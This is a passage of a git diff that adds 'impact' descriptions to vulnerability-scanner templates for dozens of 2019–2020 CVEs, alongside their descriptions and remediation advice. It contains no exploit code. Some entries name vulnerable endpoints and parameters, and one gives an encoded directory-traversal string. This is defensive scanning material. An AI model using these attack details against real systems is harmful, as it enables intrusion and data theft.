the entire Joomla! application. remediation: | Update to the latest version of Harmis Messenger (1.2.3) or apply the patch provided by the vendor to fix the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index 41f3796737..1cee80d64a 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0 severity: medium description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the Social Warfare plugin to version 3.5.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index 363f686b70..f07d6dbd89 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -5,6 +5,8 @@ info: author: joeldeleep severity: high description: Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security updates provided by Microsoft to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index e3adee1559..f50304dc02 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the SolarWinds Orion system. remediation: | Apply the necessary patches or updates provided by SolarWinds to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index c1d059a349..5c7d2b9353 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob,pdresearch severity: high description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Sonatype Nexus Repository Manager 3. reference: diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index de8d836ec7..ac2070ef6e 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index 9ac0547a4a..4e6392607d 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Upgrade to the latest version of rConfig or apply the provided patch to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index e067f01b4a..1960c821d0 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Upgrade to the latest version of rConfig or apply the provided patch to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index 73a02ae839..e3e2fe6f85 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Upgrade to a patched version of rConfig or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index 7c652142eb..1114c96b16 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and prior has unauthenticated snippets.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Upgrade rConfig to version >3.9.4 or apply the provided patch to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index 7e6ffcad9d..d429965324 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, or further attacks. remediation: | Upgrade Keycloak to a version higher than 12.0.1 to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index 2cb5f89a01..c02e8d3ff9 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Wavlink WN530HG4, WN531G3, WN533A8, and WN551K are susceptible to improper access control via /cgi-bin/ExportAllSettings.sh, where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected device. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index bbff6106f8..626eeb6c80 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: Upgrade to version 9.4.6 or later. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index 9ec3a3d338..a27ee13751 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -5,6 +5,8 @@ info: author: emadshanab severity: medium description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: This issue can be resolved by updating Grafana to the latest version. reference: - https://github.com/grafana/grafana/pull/23254 diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index 6703839e83..4a134b032f 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -6,6 +6,8 @@ info: severity: high description: | MicroStrategy Web 10.4 is susceptible to information disclosure. The JVM configuration, CPU architecture, installation folder, and other information are exposed through /MicroStrategyWS/happyaxis.jsp. An attacker can use this vulnerability to learn more about the application environment and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. remediation: Mitigated in all versions 11.0 and higher. reference: - http://packetstormsecurity.com/files/157068/MicroStrategy-Intelligence-Server-And-Web-10.4-XSS-Disclosure-SSRF-Code-Execution.html diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml index f39509143e..308baff221 100644 --- a/http/cves/2020/CVE-2020-11455.yaml +++ b/http/cves/2020/CVE-2020-11455.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server. remediation: | Upgrade to the latest version of LimeSurvey (4.1.12 or higher) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml index bfe91be835..22ddb7357b 100644 --- a/http/cves/2020/CVE-2020-11529.yaml +++ b/http/cves/2020/CVE-2020-11529.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade Grav CMS to version 1.7 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 9ec4e15b97..2138f6a6f4 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Update to the latest version of the WordPress Chop Slider 3 plugin to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 7b97dcb712..ff88b81b8a 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -5,6 +5,8 @@ info: author: Official_BlackHat13 severity: critical description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to the latest version of SuperWebmailer to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 103e8ce607..bab32f3e95 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -5,6 +5,8 @@ info: author: x6263 severity: medium description: PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the PRTG Network Monitor. remediation: | Upgrade PRTG Network Monitor to version 20.1.57.1745 or higher to mitigate the information disclosure vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index 9375ed7d91..c49c1ce138 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Kong Admin through 2.0.3 contains an issue via docker-kong which makes the admin API port accessible on interfaces other than 127.0.0.1. + impact: | + Remote attackers can gain unauthorized administrative access to the Kong Admin API. remediation: | Upgrade to Kong version 2.0.3 or later to fix the vulnerability and ensure proper authentication and access control mechanisms are in place. reference: diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index 92190b5b1a..7250d64907 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -8,6 +8,8 @@ info: WordPress Duplicator 1.3.24 & 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation. remediation: | Update the WordPress Duplicator plugin to the latest version (1.3.27 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index f91c2de8a3..ac82f6acc9 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories. + impact: | + An attacker can exploit this vulnerability to view, modify, or delete arbitrary files on the system, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest security patches or updates provided by Mitel to mitigate the vulnerability and prevent unauthorized access. reference: diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 1b56a867de..fcf36bdfea 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Micro Focus Operations Bridge Manager in versions 2020.05 and below is vulnerable to remote code execution via UCMDB. The vulnerability allows remote attackers to execute arbitrary code on affected installations of Data Center Automation. An attack requires network access and authentication as a valid application user. Originated from Metasploit module (#14654). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Micro Focus Operations Bridge Manager. reference: diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index ca58dfa05d..63f32c22af 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Micro Focus UCMDB is susceptible to remote code execution. Impacted products include Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions, and Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.), and Application Performance Management versions 9,51, 9.50 and 9.40 with UCMDB 10.33 CUP 3. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Micro Focus to fix this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index d94be96c6c..4832e36ce6 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. reference: - https://github.com/pberba/CVE-2020-11978 diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 9cb60ee8ce..9a0ef792f2 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and remote code execution. remediation: Upgrade to Apache Cocoon 2.1.13 or later. reference: - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 5b617f70fe..4445963f14 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress Catch Breadcrumb plugin (1.5.4 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index 473e6bb038..392e5f80cd 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine OpManger to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 8dc8aaf297..b768df1815 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials. remediation: | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index 4819141651..39edb109f8 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion. + impact: | + An attacker can access sensitive files on the system, potentially leading to unauthorized access, information disclosure, or further exploitation. remediation: | Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index ad2d30f4e3..c60b5d4edf 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can bypass authentication and gain unauthorized access to sensitive information. remediation: | Upgrade to a patched version of TeamPass or apply the recommended security patches. reference: diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index e8b41142b1..c9c2c66c93 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying system. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of vBulletin. reference: diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml index b6875bf25e..5ffb333c39 100644 --- a/http/cves/2020/CVE-2020-12800.yaml +++ b/http/cves/2020/CVE-2020-12800.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected WordPress site. remediation: | Update the Contact Form 7 plugin to version 1.3.3.3 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index a6b3d6c3c4..cb2bed59fc 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 3c838fa841..030e83565b 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index c15aba993a..b70875a437 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. remediation: | Upgrade to Artica Proxy Community Edition version 4.30.000000 or later to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 89b1dd8a89..895bc23cad 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system. remediation: | Upgrade to a patched version of Netsweeper (>=6.4.4) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 7c147fd267..3dad3219a3 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Contentful to a version that is not vulnerable to CVE-2020-13258 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 4c7271634f..ab68265702 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. remediation: Upgrade to 6.3.4 or higher. reference: - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9 diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index db1237dbf3..6ab0c5a1b1 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. remediation: | Upgrade Microweber to version 1.1.20 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 1f3dd04976..20b7c5a27d 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,3th1c_yuk1 severity: medium description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index c65a25f842..f5d3592f89 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values. + impact: | + An attacker can exploit this vulnerability to access sensitive data, such as user information or administrative credentials. remediation: | Update the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches. reference: diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 5af75f43af..0945e45f65 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Extreme Management Center. reference: diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index b151e7241b..1e2bd80335 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Airflow's Experimental API prior 1.10.11 allows all API requests without authentication. + impact: | + Allows unauthorized access to Airflow Experimental REST API remediation: | From Airflow 